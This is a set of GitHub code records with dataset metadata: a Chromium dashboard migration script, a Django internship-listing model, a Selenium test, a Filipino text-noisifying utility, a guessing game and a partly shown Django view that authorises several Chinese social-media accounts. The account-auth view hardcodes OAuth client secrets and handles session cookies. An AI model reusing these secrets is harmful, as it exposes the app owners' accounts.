ndb.put_multi(gates_to_write)\n\n return f'{len(gates_to_write)} missing gates created for stages.'\n\n\nclass MigrateGeckoViews(FlaskHandler):\n\n MAPPING = {\n GECKO_IMPORTANT: PUBLIC_SUPPORT,\n GECKO_WORTH_PROTOTYPING: PUBLIC_SUPPORT,\n GECKO_NONHARMFUL: NEUTRAL,\n GECKO_HARMFUL: OPPOSED,\n }\n\n def update_ff_views(self, fe):\n \"\"\"Update ff_views and return True if update was needed.\"\"\"\n if fe.ff_views in self.MAPPING:\n fe.ff_views = self.MAPPING[fe.ff_views]\n return True\n\n return False\n\n def get_template_data(self, **kwargs):\n \"\"\"Change gecko views from old options to a more common list.\"\"\"\n self.require_cron_header()\n\n features: ndb.Query = FeatureEntry.query(\n FeatureEntry.ff_views != NO_PUBLIC_SIGNALS)\n count = 0\n batch = []\n BATCH_SIZE = 100\n for fe in features:\n if self.update_ff_views(fe):\n batch.append(fe)\n count += 1\n if len(batch) > BATCH_SIZE:\n ndb.put_multi(batch)\n batch = []\n\n ndb.put_multi(batch)\n return f'{count} FeatureEntry entities updated.'\n","repo_name":"DreamHigh0820/chromium-dashboard","sub_path":"internals/maintenance_scripts.py","file_name":"maintenance_scripts.py","file_ext":"py","file_size_in_byte":3989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"72225343631","text":"from notifications.signals import notify\n\nfrom django.utils import timezone\nfrom django.db import models\nfrom django.urls import reverse\nfrom django.contrib.auth import get_user_model\n\n\nINTERN_TYPES = (\n ('Paid', 'Paid'),\n ('Unpaid', 'Unpaid')\n)\n\nINTERN_WHERE = (\n ('Virtual', 'Virtual'),\n ('In-Person', 'In-Person')\n)\n\n\nclass Listing(models.Model):\n company = models.ForeignKey(\n 'accounts.User', on_delete=models.CASCADE, related_name='listing')\n title = models.CharField(max_length=50)\n type = models.CharField(choices=INTERN_TYPES, max_length=20)\n where = models.CharField(choices=INTERN_WHERE, max_length=20)\n career = models.ForeignKey(\n 'Career', related_name='listings', blank=True, on_delete=models.CASCADE)\n new_career = models.CharField(blank=True, max_length=30)\n pay = models.CharField(blank=True, max_length=20)\n time_commitment = models.CharField(max_length=20)\n location = models.TextField(blank=True)\n application_deadline = models.DateTimeField()\n description = models.TextField()\n\n # students that have been accepted, rejected and requested\n # visible on the employer's account\n # needed in order to archive accepted/rejected student without affecting other accounts viewing the same field\n employer_acceptances = models.ManyToManyField(\n 'accounts.User', related_name='employer_acceptances', blank=True)\n employer_rejections = models.ManyToManyField(\n 'accounts.User', related_name='employer_rejections', blank=True)\n employer_interview_requests = models.ManyToManyField('accounts.User', related_name='employer_interview_requests',\n blank=True)\n\n # students that have been accepted, rejected and requested\n # visible on the student's account\n # needed in order to archive the students acceptance/rejection/request without affecting other accounts viewing the same field\n student_acceptances = models.ManyToManyField(\n 'accounts.User', related_name='student_acceptances', blank=True)\n student_rejections = models.ManyToManyField(\n 'accounts.User', related_name='student_rejections', blank=True)\n student_interview_requests = models.ManyToManyField('accounts.User', related_name='student_interview_requests',\n blank=True)\n\n # constant acceptances, rejections and requests\n # these are not viewed on any account\n # needed in order to create status updates\n acceptances = models.ManyToManyField(\n 'accounts.User', related_name='listing_acceptances', blank=True)\n rejections = models.ManyToManyField(\n 'accounts.User', related_name='listing_rejections', blank=True)\n interview_requests = models.ManyToManyField(\n 'accounts.User', related_name='interviews', blank=True)\n\n # if all of the above was one group of fields, users would be affected by another users actions so\n # the state of a users application is kept in an isolated group\n\n awaiting_confirm_acceptance = models.ManyToManyField(\n 'accounts.User', related_name='awaiting_confirm_acceptance', blank=True\n )\n applications = models.ManyToManyField(\n 'accounts.User', related_name='applications', blank=True)\n\n application_url = models.URLField(blank=True, null=True)\n posted = models.DateField(default=timezone.now, blank=True)\n slug = models.SlugField(max_length=50, unique=False, blank=True)\n\n already_applied = models.ManyToManyField(\n 'accounts.User', related_name='already_applied', blank=True)\n\n @property\n def summarize(self):\n data = {\n 'company': self.company,\n 'title': self.title,\n 'where': self.where,\n 'career': self.career,\n 'pay': self.pay,\n 'time_commitment': self.time_commitment,\n 'location': self.location,\n 'applications': [application for application in self.applications.all()],\n 'rejections': [rejection for rejection in self.rejections.all()],\n 'interview requests': [request for request in self.interview_requests.all()],\n 'application url': self.application_url,\n 'posted': self.posted,\n 'slug': self.slug\n }\n\n return data\n\n def get_absolute_url(self):\n return reverse('listing', kwargs={'slug': self.slug})\n\n def has_student_already_applied(self, student) -> bool:\n return student in self.already_applied.all()\n\n def apply(self, student):\n self.add_application(student)\n if not self.has_student_already_applied(student):\n self.already_applied.add(student)\n\n if self.company.notifications.unread().filter(actor_object_id=self.id).filter(action_object_object_id=student.id).count() != 0:\n return\n\n notify.send(recipient=self.company, verb='someone applied!',\n actor=self, sender=self, action_object=student)\n\n def unapply(self, student):\n self.remove_application(student)\n if student in self.interview_requests.all():\n self.interview_requests.remove(student)\n if student in self.student_interview_requests.all():\n self.student_interview_requests.remove(student)\n if student in self.employer_interview_requests.all():\n self.employer_interview_requests.remove(student)\n\n def add_application(self, student):\n self.applications.add(student)\n\n def remove_application(self, student):\n self.applications.remove(student)\n\n def archive_student_acceptance(self, student):\n self.student_acceptances.remove(student)\n\n def archive_student_rejection(self, student):\n self.student_rejections.remove(student)\n\n def archive_interview_request(self, student):\n self.student_interview_requests.remove(student)\n\n def check_if_accepted(self, user):\n return user in self.awaiting_confirm_acceptance.all()\n\n def remove_from_interview(self, student):\n if student in self.interview_requests.all():\n self.interview_requests.remove(student)\n if student in self.student_interview_requests.all():\n self.student_interview_requests.remove(student)\n if student in self.employer_interview_requests.all():\n self.employer_interview_requests.remove(student)\n\n def decline_acceptance(self, student):\n self.awaiting_confirm_acceptance.remove(student)\n\n def confirm_acceptance(self, student):\n for listing in student.applications.all():\n listing.remove_application(student)\n\n for listing in student.awaiting_confirm_acceptance.all():\n listing.awaiting_confirm_acceptance.remove(student)\n\n self.awaiting_confirm_acceptance.remove(student)\n self.acceptances.add(student)\n self.employer_acceptances.add(student)\n self.student_acceptances.add(student)\n\n def accept(self, student):\n self.applications.remove(student)\n self.awaiting_confirm_acceptance.add(student)\n self.remove_from_interview(student)\n\n def reject(self, student):\n\n self.applications.remove(student)\n self.rejections.add(student)\n self.employer_rejections.add(student)\n self.student_rejections.add(student)\n\n self.remove_from_interview(student)\n\n def request_interview(self, student):\n self.interview_requests.add(student)\n self.employer_interview_requests.add(student)\n self.student_interview_requests.add(student)\n\n def __str__(self):\n return self.title\n\n\nclass Career(models.Model):\n career = models.CharField(max_length=30)\n\n def __str__(self):\n return self.career\n","repo_name":"christianstefaniw/interniac-website","sub_path":"marketplace/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7738,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"83"}
{"seq_id":"20183580531","text":"from selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium import webdriver\nimport time\n\n\nlink = \"https://anflat.ru/\"\nbrowser = webdriver.Chrome()\nbrowser.maximize_window()\nurl = browser.current_url\nbrowser.get(link)\n# Selectors:\nmainH1 = browser.find_element(By.CSS_SELECTOR, \"h1 div\")\nmainH1Text = mainH1.text\nprint(mainH1Text)\nexpectedH1Text = \"Купить квартиру в Казани - подбор объектов\"\n# Helper function for the check\ndef test_input_text(expected_result, actual_result):\n assert actual_result == expected_result\n print(\"Done\")\n\n\ntime.sleep(2)\ntest_input_text(expectedH1Text, mainH1Text)","repo_name":"Khamatov/Stepik2","sub_path":"module3/test_anflatFX1.py","file_name":"test_anflatFX1.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"25696103458","text":"\"\"\"This module handles all noisy text generation.\"\"\"\nimport re\nimport random\nfrom pprint import pprint\nimport nltk.tokenize as tokenizer\nfrom .hyphenator import Hyphenator\n\n\nclass TextNoisifier:\n \"\"\"Handles all text noisification rules.\"\"\"\n\n def __init__(self,\n accent_words_dict,\n phonetic_subwords_dict,\n phonetic_words_dict,\n hyphenator_dict):\n \"\"\"Initialize all dictionaries and Regex for string manipulation.\"\"\"\n self.accent_words_dict = accent_words_dict\n\n self.phonetic_words_dict = phonetic_words_dict\n self.phonetic_subwords_dict = phonetic_subwords_dict\n\n self.re_adj_vowels = re.compile(r'[aeiou]{2,}', re.IGNORECASE)\n self.re_accepted = re.compile(r\"\\b[\\sA-Za-z'-]+\\b\")\n self.re_hyphens = re.compile(r'(-)')\n\n self.vowels = 'aeiou'\n self.lower_vowels = self.vowels\n self.upper_vowels = self.vowels.upper()\n self.vowels += self.upper_vowels\n\n self.consonants = \"bcdfghjklmnpqrstvwxyz\"\n self.lower_consonants = self.consonants\n self.upper_consonants = self.consonants.upper()\n self.consonants += self.upper_consonants\n\n self.alphabet = self.vowels + self.consonants\n self.lower_alphabet = ''.join(list(set(self.alphabet.lower())))\n self.upper_alphabet = ''.join(list(set(self.alphabet.upper())))\n\n matches = re.findall(r\"{(.*?)\\}\",\n hyphenator_dict,\n re.MULTILINE | re.DOTALL)\n\n patterns = matches[0]\n exceptions = matches[1]\n self.hyphenator = Hyphenator(patterns, exceptions)\n\n self.mwes = []\n for k, v in accent_words_dict.items():\n words = k.split()\n if len(words) > 1:\n self.mwes.append(tuple(words))\n words[0] = words[0].capitalize()\n self.mwes.append(tuple(words))\n\n print(\"============= Multi-word Expressions =================\")\n pprint(self.mwes)\n\n self.mwe_tokenizer = tokenizer.MWETokenizer(self.mwes, separator=' ')\n\n self.expand_pattern = re.compile(r\"(\\w+[aeiou])'([yt])\", re.IGNORECASE)\n self.expand_repl = r'\\1 a\\2'\n\n self.contract_pattern = re.compile(r'(\\w+[aeiou])\\s\\ba([ty]\\b)',\n re.IGNORECASE)\n self.contract_repl = r\"\\1'\\2\"\n # FIXME: Has the tendency to normalize words like \"Antipolo\", \"Antik\"\n self.text_patterns = [\n # Ang baho -> Ambaho\n (re.compile(r'(\\b[aA])(ng\\s)(\\b[bp]\\w+\\b)'), r'\\1m\\3'),\n # Ang dami -> Andami\n (re.compile(r'(\\b[aA]n)(g\\s)(\\b[gkhsldt]\\w+\\b)'), r'\\1\\3'),\n # Ano ba -> Anuba\n (re.compile(r'(\\b[aA]n)(o\\s)(\\b\\w{2}\\b)'), r'\\1u\\3'),\n # Pagkain -> Pag kain\n (re.compile(r'(pag)(\\w+)'), r'\\1 \\2'),\n # na naman -> nanaman\n (re.compile(r'(\\b(ka|pa|na|di)\\b)\\s(\\b[A-Za-z]{,2}\\b)',\n re.IGNORECASE), r'\\1\\3')\n ]\n\n
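# The two patterns below swap the homophones 'ng' and 'nang' to mimic a
# common Filipino misspelling; an illustrative (hypothetical) call:
# ng2nang('dami ng tao') -> 'dami nang tao'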
\"\"\"\n >>> nang\n Replacement for 'noong'.\n Sagot sa paano o gaano.\n Pang-angkop sa pandiwang inuulit (Tulog ka nang tulog)\n Kung pinagsamang 'na' at 'ang', 'na' at 'ng', o ng 'na' at 'na'\n\n >>> ng\n Pantukoy ng pangalan\n Pagpapahiwatig ng pagmamay-ari\n \"\"\"\n self.ng2nang_pattern = re.compile(r'\\bng\\b')\n self.ng2nang_repl = r'nang'\n self.nang2ng_pattern = re.compile(r'r\\bnang\\b')\n self.nang2ng_repl = r'ng'\n\n self.raw_daw = \\\n re.compile(r'\\b([^aeiou]|[aeiou])\\b\\s([dr])(aw|ito|oon|in)',\n re.IGNORECASE)\n self.vocabulary = None\n\n def ng2nang(self, text):\n return self.ng2nang_pattern.sub(self.ng2nang_repl, text)\n\n def nang2ng(self, text):\n return self.nang2ng_pattern.sub(self.nang2ng_repl, text)\n\n def contract_expr(self, text):\n return self.contract_pattern.sub(self.contract_repl, text)\n\n @staticmethod\n def _format(match, repl):\n return \"{} {}{}\".format(\n match.group(1),\n repl if match.group(2).islower() else repl.upper(),\n match.group(3))\n\n def raw_daw_repl(self, match):\n \"\"\"Misuse raw and daw in sentence.\"\"\"\n if match.group(1) in self.vowels:\n return self._format(match, 'd') # raw\n elif match.group(1) in self.consonants:\n return self._format(match, 'r') # daw\n\n def remove_vowels(self, word):\n \"\"\"Remove vowels randomly from a word.\"\"\"\n vowel_sample = random.sample(self.vowels,\n random.randrange(len(self.vowels)))\n remove_vowel_rule = str.maketrans(dict.fromkeys(vowel_sample,\n None))\n if len(word) == 4 and word[0] in self.vowels:\n if random.getrandbits(1):\n return word[1:]\n if not self.re_adj_vowels.search(word) and len(word) > 3:\n w_len = len(word)\n center = w_len // 2\n if random.getrandbits(1):\n if random.getrandbits(1): # left\n word = word[0] \\\n + word[1:center].translate(remove_vowel_rule) \\\n + word[center:]\n if random.getrandbits(1): # middle\n start = center // 2\n end = center + start\n word = word[:start] \\\n + word[start:end].translate(remove_vowel_rule) \\\n + word[end:]\n if random.getrandbits(1): # right\n word = word[:center] \\\n + word[center:w_len-1].translate(remove_vowel_rule) \\\n + word[-1]\n else: # all\n word = word[0] \\\n + word[1:-1].translate(remove_vowel_rule) \\\n + word[-1]\n elif len(word) == 2 and word[-1] in self.vowels:\n word = word[0]\n return word\n\n def remove_all_vowels(self, word):\n remove_vowel_rule = str.maketrans(dict.fromkeys(self.vowels,\n None))\n if len(word) == 4 and word[0] in self.vowels and random.getrandbits(1):\n word = word[1:]\n elif not self.re_adj_vowels.search(word) and len(word) > 3:\n word = word[0] \\\n + word[1:-1].translate(remove_vowel_rule) \\\n + word[-1]\n elif len(word) == 2 and word[-1] in self.vowels:\n word = word[0]\n return word\n\n def repeat_characters(self, word):\n \"\"\"Repeat characters from left or right portion of the word.\"\"\"\n letter = random.choice(self.alphabet)\n length = random.randrange(2, 10)\n if random.getrandbits(1):\n word = word.replace(letter, letter * length, 1)\n else:\n word = word[::-1].replace(letter, letter * length, 1)[::-1]\n return word\n\n def misspell(self, word):\n \"\"\"Replace/Delete/Insert a character in a word to misspell.\"\"\"\n if random.getrandbits(1):\n word = self._one_char_edit(word)\n else:\n word = self._two_char_edit(word)\n return word\n\n def _one_char_edit(self, word):\n edit = random.choice(['del', 'ins', 'rep', 'tra'])\n idx = random.randrange(len(word) + 1)\n letter = random.choice(self.lower_alphabet)\n\n lsplit, rsplit = word[:idx], word[idx:]\n if edit == 'del' and rsplit:\n 
word = lsplit + rsplit[1:]\n elif edit == 'tra' and len(rsplit) > 1:\n word = lsplit + rsplit[1] + rsplit[0] + rsplit[2:]\n elif edit == 'rep':\n word = lsplit + letter + rsplit[1:]\n elif edit == 'ins':\n word = lsplit + letter + rsplit\n return word\n\n def _two_char_edit(self, word):\n return self._one_char_edit(self._one_char_edit(word))\n\n def phonetic_style_subwords(self, word):\n \"\"\"Return a phonetically styled portion of a word.\"\"\"\n return self._subword_substitution(word, self.phonetic_subwords_dict)\n\n def phonetic_style_words(self, word):\n \"\"\"Return a phonetically styled word.\"\"\"\n return self._word_substitution(word, self.phonetic_words_dict)\n\n @staticmethod\n def _word_substitution(word, substitution_dict):\n \"\"\"Find the substitute in the text and replace.\"\"\"\n is_upper = word[0].isupper()\n is_allcaps = str.isupper(word)\n\n word = word.lower()\n v = substitution_dict.get(word, word)\n repl = random.choice(v) if isinstance(v, list) else v\n word = word.replace(word, repl)\n word = word.replace(\"'\", '')\n if is_upper:\n word = word.capitalize()\n if is_allcaps:\n word = word.upper()\n return word\n\n @staticmethod\n def _subword_substitution(word, substitution_dict):\n for k, v in substitution_dict.items():\n try:\n is_upper = word[0].isupper()\n is_allcaps = str.isupper(word)\n except IndexError:\n continue\n word = word.lower()\n repl = random.choice(v) if isinstance(v, list) else v\n word = word.replace(k, repl)\n if random.getrandbits(1):\n word = word.replace(\"'\", '')\n if is_upper:\n word = word.capitalize()\n if is_allcaps:\n word = word.upper()\n return word\n\n def phonetic_style(self, text):\n \"\"\"Phonetic style for the word.\"\"\"\n result = self.phonetic_style_words(text)\n return self.phonetic_style_subwords(result)\n\n def accent_style(self, text):\n \"\"\"Accent style a word.\"\"\"\n return self._word_substitution(text, self.accent_words_dict)\n\n def group_repeating_units(self, word):\n \"\"\"Group repeating units by grouping the syllables.\"\"\"\n hyphenated_words = self.re_hyphens.split(word)\n if len(hyphenated_words) > 1:\n if hyphenated_words[0].lower().find(hyphenated_words[2]) != -1:\n end = len(hyphenated_words[0])\n word = hyphenated_words[0][:end] \\\n + '2' + hyphenated_words[2][end:]\n elif hyphenated_words[2].find(hyphenated_words[0].lower()) != -1:\n end = len(hyphenated_words[0])\n word = hyphenated_words[0][:end] \\\n + '2' + hyphenated_words[2][end:]\n\n word = self.group_units(self.hyphenator.hyphenate_word(word))\n return word\n\n @staticmethod\n def group_units(units):\n \"\"\"Group syllables with the no. 
of occurrences.\"\"\"\n for i in range(len(units) - 1):\n if units[i] != '' and units[i].lower() == units[i + 1].lower():\n units[i + 1] = str(2)\n elif units[i] != '' and units[i].lower() \\\n == units[i + 1][:-(len(units[i]))].lower():\n units[i + 1] = str(2) + units[i + 1][(len(units[i])):]\n return ''.join(units)\n\n def noisify(self, word, sos=False, with_tag=False):\n \"\"\"Randomly apply string manipulation.\n\n It only accepts alphabet, apostrophe and hyphen.\n The string length must be greater than 1.\n It doesn't accept capital letters, hacky way to avoid named-entity to be noisified.\n\n \"\"\"\n if self.re_accepted.search(word) \\\n and len(word) > 1 \\\n and (sos or word[0].islower()):\n\n # accented = self.accent_style(word)\n # if accented != word:\n # word = accented.replace('-', '')\n # return (word, 'accent_styles') if with_tag else word\n\n # phonetically_styled = self.phonetic_style(word)\n # if phonetically_styled != word:\n # word = phonetically_styled.replace('-', '')\n # return (word, 'phonetic_styles') if with_tag else word\n\n grouped_units = self.group_repeating_units(word)\n if grouped_units != word:\n word = grouped_units.replace('-', '')\n return (word, 'repeating_units') if with_tag else word\n\n value = random.random()\n selected = ''\n if value > 0.80:\n selected = 'repeating_characters'\n elif value > 0.50:\n selected = 'contractions'\n else:\n selected = 'misspellings'\n noisified = self.dispatch_rules(selected, word)\n if with_tag:\n if noisified != word and not self.vocabulary.get(noisified):\n word = word.replace('-', '')\n word = (noisified, selected)\n else:\n word = word.replace('-', '')\n word = (word, None)\n else:\n word = noisified\n word = word.replace('-', '')\n else:\n word = (word, None) if with_tag else word\n return word\n\n def noisify2(self, word, sos=False, with_tag=False):\n \"\"\"Randomly apply string manipulation.\n\n It only accepts alphabet, apostrophe and hyphen.\n The string length must be greater than 1.\n It doesn't accept capital letters, hacky way to avoid named-entity to be noisified.\n\n \"\"\"\n if self.re_accepted.search(word) \\\n and len(word) > 1 \\\n and (sos or word[0].islower()):\n value = random.random()\n selected = ''\n if value > 0.80:\n selected = 'repeating_characters'\n elif value > 0.50:\n selected = 'contractions'\n else:\n selected = 'misspellings'\n noisified = self.dispatch_rules(selected, word)\n if with_tag:\n if noisified != word:\n word = word.replace('-', '')\n word = (noisified, selected)\n else:\n word = word.replace('-', '')\n word = (word, None)\n else:\n word = noisified\n word = word.replace('-', '')\n else:\n word = (word, None) if with_tag else word\n return word\n\n def dispatch_rules(self, rule, word):\n \"\"\"Text noisifier dispatcher.\"\"\"\n return {\n 'contractions': self.remove_vowels(word),\n 'phonetic_style': self.phonetic_style(word),\n 'misspellings': self.misspell(word),\n 'accent_styles': self.accent_style(word),\n 'repeating_characters': self.repeat_characters(word),\n 'repeating_units': self.group_repeating_units(word)\n }.get(rule, word)\n","repo_name":"ryangmolina/text-normalizer","sub_path":"training/data/textnoisifier.py","file_name":"textnoisifier.py","file_ext":"py","file_size_in_byte":14781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"5491134094","text":"from random import randint #importação da biblioteca randint/random\n\ndef numberGame(): \n number = randint(1,100)#escolher um numero aleatorio entre 1 
e 100 \n #exibe para o usuário\n print(\"Eu estou pensando em um número entre 1 e 100.\")\n palpite = int(input(\"Qual o seu palpite? \"))\n #condicionais, que comparam o numero escolhido aleatoriamente e o que palpite\n if (number==palpite):\n print(\"É isso mesmo, esse é o número \\0/\")\n elif(number>palpite):\n print(\"Poxa...:/. É um pouco maior\")\n else:\n print(\"Poxa, é um pouco menor :/\")\n #print(number)\nnumberGame() #chamada da função\n\n \n","repo_name":"iasminimp/pic_python","sub_path":"Codigos pt.3/code11.py","file_name":"code11.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"27056291285","text":"import asyncio\nimport time\nfrom datetime import datetime, timedelta\nfrom urllib import parse\n\nimport requests\nfrom django.http import JsonResponse\nfrom django.shortcuts import render, redirect, HttpResponse\nfrom django.utils import timezone\nfrom django.db.models import Q, Sum\nfrom asgiref.sync import sync_to_async, async_to_sync\n\nfrom mainsite import models\nfrom mainsite.utils.get_data import GetData\n\n\ndef account_auth_list(request):\n \"\"\"账号授权列表\"\"\"\n\n # 前端选中标签与头部标签\n active_account_auth = \"\"\n header_label = \"\"\n if request.path == \"/account/auth/list/\":\n active_account_auth = \"active\"\n header_label = \"授权管理\"\n\n # 抖音授权\n client_key = \"awpswfd65m22r59e\" # 应用唯一标识\n response_type = \"code\" # 默认值 code\n scope = \"user_info,data.external.user,video.list.bind,video.data.bind,renew_refresh_token,data.external.item,data.external.billboard_hot_video\" # 应用授权作用域\n # optionalScope = \"user_info,1,data.external.user,1\" # 应用授权可选作用域&optionalScope={optionalScope}\n redirect_uri = \"https://www.baidu.com\" # 授权成功后的回调地址\n get_accredit_url = f\"https://open.douyin.com/platform/oauth/connect?client_key={client_key}&response_type={response_type}&scope={scope}&redirect_uri={redirect_uri}\"\n\n context = {\n \"now\": timezone.now(), # 当前时间\n \"get_accredit_url\": get_accredit_url, # 抖音授权地址\n \"active_account_auth\": active_account_auth,\n \"header_label\": header_label,\n }\n\n return render(request, \"account_auth_list.html\", context)\n\n\ndef account_auth_zhihu(request):\n \"\"\"账号授权知乎\"\"\"\n\n # 获取当前登陆的用户uid\n uid = request.session.get(\"info\").get(\"uid\")\n\n if request.method == \"POST\":\n z_c0 = request.POST.get(\"z_c0\")\n if z_c0:\n cookies = {\"z_c0\": z_c0}\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15\"\n }\n url = \"https://www.zhihu.com/api/v4/me\"\n response = requests.get(url, headers=headers, cookies=cookies)\n user_info = response.json()\n nickname = user_info.get(\"name\")\n avatar = user_info.get(\"avatar_url\")\n auth_time = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n expires_time = (datetime.now() + timedelta(days=180)).strftime(\n \"%Y-%m-%d %H:%M:%S\"\n )\n zh_uid = user_info.get(\"id\")\n user_info_dict = {\n \"uid_id\": uid,\n \"nickname\": nickname,\n \"avatar\": avatar,\n \"auth_time\": auth_time,\n \"expires_time\": expires_time,\n \"z_c0\": z_c0,\n }\n exists = models.PlatFormZhiHu.objects.filter(zh_uid=zh_uid).exists()\n if exists:\n models.PlatFormZhiHu.objects.filter(zh_uid=zh_uid).update(\n **user_info_dict\n )\n else:\n user_info_dict[\"zh_uid\"] = zh_uid\n models.PlatFormZhiHu.objects.create(**user_info_dict)\n\n return redirect(\"/account/auth/list/\")\n\n\ndef account_auth_douyin(request):\n 
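# Flow (summary of the body below): parse ?code= from the OAuth redirect URL,\n    # exchange it for access/refresh tokens, fetch the user's basic profile,\n    # then insert or update the matching PlatFormDouYin row.\n    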
\"\"\"账号授权抖音\"\"\"\n\n # 获取当前登陆的用户uid\n data_dict = {\"uid\": request.session.get(\"info\").get(\"uid\")}\n\n # 获取用户授权信息\n if request.method == \"POST\":\n # 获取扫码后重定向的query参数\n redict_parse = request.POST.get(\"redict_parse\")\n if redict_parse:\n url = parse.urlparse(redict_parse)\n query_dict = parse.parse_qs(url.query)\n code_option = query_dict.get(\"code\")\n if code_option:\n code = code_option[0]\n # 获取(access_token, open_id, refresh_token)\n access_token_url = \"https://open.douyin.com/oauth/access_token/\"\n access_token_json = {\n \"grant_type\": \"authorization_code\",\n \"client_key\": \"awpswfd65m22r59e\",\n \"client_secret\": \"f801426192c924f33d6f67d702ba0099\",\n \"code\": code,\n }\n access_token_header = {\"Content-Type\": \"application/json\"}\n access_token_responses = requests.post(\n url=access_token_url,\n json=access_token_json,\n headers=access_token_header,\n )\n access_token_responses_responses_data = access_token_responses.json()\n\n access_token = access_token_responses_responses_data[\"data\"][\n \"access_token\"\n ]\n open_id = access_token_responses_responses_data[\"data\"][\"open_id\"]\n refresh_token = access_token_responses_responses_data[\"data\"][\n \"refresh_token\"\n ]\n expires_in = access_token_responses_responses_data[\"data\"][\"expires_in\"]\n\n # 获取用户基本信息()\n user_open_info_url = \"https://open.douyin.com/oauth/userinfo/\"\n user_open_info_json = {\"access_token\": access_token, \"open_id\": open_id}\n user_open_info_header = {\n \"Content-Type\": \"application/x-www-form-urlencoded\"\n }\n user_open_info_responses = requests.post(\n url=user_open_info_url,\n data=user_open_info_json,\n headers=user_open_info_header,\n )\n user_open_info_responses_data = user_open_info_responses.json()\n\n nickname = user_open_info_responses_data[\"data\"][\"nickname\"]\n avatar = user_open_info_responses_data[\"data\"][\"avatar\"]\n e_account_role = user_open_info_responses_data[\"data\"][\"e_account_role\"]\n\n # 用户基本参数\n # 将时间转成datetime类型\n expires_time = datetime.now() + timedelta(seconds=expires_in)\n expires_time = datetime.strftime(expires_time, \"%Y-%m-%d %H:%M:%S\")\n auth_time = datetime.now()\n auth_time = datetime.strftime(auth_time, \"%Y-%m-%d %H:%M:%S\")\n e_account_role_identify = e_account_role if e_account_role else \"None\"\n user_info_dict = {\n \"uid_id\": data_dict.get(\"uid\"),\n \"nickname\": nickname,\n \"access_token\": access_token,\n \"refresh_token\": refresh_token,\n \"avatar\": avatar,\n \"e_account_role\": e_account_role_identify,\n \"expires_in\": expires_time,\n \"auth_time\": auth_time,\n }\n\n # 判断账号是否存在\n exists = models.PlatFormDouYin.objects.filter(open_id=open_id).exists()\n if exists:\n models.PlatFormDouYin.objects.filter(open_id=open_id).update(\n **user_info_dict\n )\n else:\n user_info_dict[\"open_id\"] = open_id\n models.PlatFormDouYin.objects.create(**user_info_dict)\n\n return redirect(\"/account/auth/list/\")\n\n\ndef account_auth_bilibili(request):\n \"\"\"账号授权 Bilibili\"\"\"\n\n # 获取当前登陆的用户uid\n uid = request.session.get(\"info\").get(\"uid\")\n\n # 获取用户授权信息\n if request.method == \"POST\":\n # 获取扫码后重定向的query参数\n return_url = request.POST.get(\"return_url\")\n if return_url:\n url = parse.urlparse(return_url)\n query_dict = parse.parse_qs(url.query)\n code_option = query_dict.get(\"code\")\n if code_option:\n code = code_option[0]\n access_token_url = \"https://api.bilibili.com/x/account-oauth2/v1/token\"\n access_token_json = {\n \"client_id\": \"302763bae0404eee\",\n \"client_secret\": 
\"aef73864a09a42bcbe1bbec8130ee5ed\",\n \"grant_type\": \"authorization_code\",\n \"code\": code,\n }\n access_token_response = requests.post(\n url=access_token_url, json=access_token_json\n )\n access_token_result = access_token_response.json()\n if access_token_result.get(\"code\") == 0:\n data = access_token_result.get(\"data\")\n access_token = data.get(\"access_token\", \"\")\n expires_in = data.get(\"expires_in\", \"\")\n refresh_token = data.get(\"refresh_token\", \"\")\n\n # 获取用户信息\n user_info_url = (\n \"https://member.bilibili.com/arcopen/fn/user/account/info\"\n )\n user_info_param = {\n \"client_id\": \"302763bae0404eee\",\n \"access_token\": access_token,\n }\n user_info_response = requests.get(\n url=user_info_url, params=user_info_param\n )\n user_info_result = user_info_response.json()\n if user_info_result.get(\"code\") == 0:\n data = user_info_result.get(\"data\")\n nickname = data.get(\"name\", \"\")\n avatar = data.get(\"face\", \"\")\n openid = data.get(\"openid\", \"\")\n\n time_object = datetime.utcfromtimestamp(expires_in)\n expires_time = time_object.strftime(\"%Y-%m-%d %H:%M:%S\")\n auth_time = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n row_object = {\n \"access_token\": access_token,\n \"refresh_token\": refresh_token,\n \"nickname\": nickname,\n \"avatar\": avatar,\n \"expires_in\": expires_time,\n \"auth_time\": auth_time,\n \"uid_id\": uid,\n }\n\n exists = models.PlatFormBilibili.objects.filter(\n openid=openid\n ).exists()\n if exists:\n models.PlatFormBilibili.objects.filter(\n openid=openid\n ).update(**row_object)\n else:\n row_object[\"openid\"] = openid\n models.PlatFormBilibili.objects.create(**row_object)\n\n else:\n mes = user_info_result.get(\"message\")\n print(mes)\n\n else:\n mes = access_token_result.get(\"message\")\n print(mes)\n\n return redirect(\"/account/auth/list/\")\n\n\ndef account_auth_baijiahao(request):\n \"\"\"账号授权百家号\"\"\"\n\n # 获取当前登陆的用户uid\n uid = request.session.get(\"info\").get(\"uid\")\n\n if request.method == \"POST\":\n bduss = request.POST.get(\"bduss\")\n token = request.POST.get(\"token\")\n bjhstoken = request.POST.get(\"bjhstoken\")\n cookies = {\"BDUSS\": bduss}\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15\",\n \"token\": token,\n }\n response = requests.get(\n \"https://baijiahao.baidu.com/builder/app/appinfo\",\n cookies=cookies,\n headers=headers,\n )\n result = response.json()\n errno = result.get(\"errno\")\n if errno != 0:\n return HttpResponse(\"BDUSS 或 token 错误\")\n nickname = result[\"data\"][\"user\"][\"name\"]\n avatar = result[\"data\"][\"user\"][\"avatar\"].replace(\"//\", \"https://\")\n auth_time = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n expires_time = (datetime.now() + 